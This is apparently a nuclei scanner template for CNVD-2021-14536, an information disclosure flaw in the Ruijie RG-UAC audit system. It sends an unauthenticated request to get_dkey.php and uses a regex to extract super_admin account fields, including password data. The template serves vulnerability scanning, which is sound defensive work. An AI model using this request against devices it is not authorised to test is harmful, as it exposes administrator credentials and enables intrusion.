id: Ruijie_UAC_leakage

info:
  name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
  author: daffainfo
  severity: high
  reference:
    - https://github.com/projectdiscovery/nuclei-templates/blob/master/cnvd/2021/CNVD-2021-14536.yaml
  tags: ruijie,cnvd,cnvd2021,disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/get_dkey.php?user=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"pre_define"'
          - '"auth_method"'
          - '"name"'
          - '"password"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'